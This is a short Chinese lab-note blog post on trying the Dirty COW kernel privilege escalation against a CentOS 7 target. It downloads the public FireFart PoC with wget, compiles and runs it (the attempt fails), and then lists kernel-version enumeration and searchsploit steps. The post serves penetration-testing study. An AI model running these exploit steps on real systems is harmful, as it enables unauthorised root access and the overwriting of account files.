dirtyCow脏牛内核提权

dirtyCow脏牛内核提权

这里我靶机用的是centos7,版本信息为

Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

image-20220124000534439

下载poc

wget https://github.com/FireFart/dirtycow/archive/master.zip

解压

unzip master.zip

编译

gcc -pthread dirty.c -o dirty -lcrypt

执行

./dirtyCow test(test输入的是密码)

image-20220123235901367

到这里就应该执行成功了,但是使用cat /etc/passwd查看用户时候,未发现firefart用户,未成功,应该是该版本不存在该漏洞。

image-20220124000039854 - 副本.png

其它内核漏洞提权

另外记录一下其它内核漏洞提权方法

1、查看发行版

cat /etc/issue
cat /etc/*-release

2、查看内核版本

uname -a

3、用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码

searchsploit dirty

image-20220124002030865

参考:https://www.jianshu.com/p/db72a58649cc

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值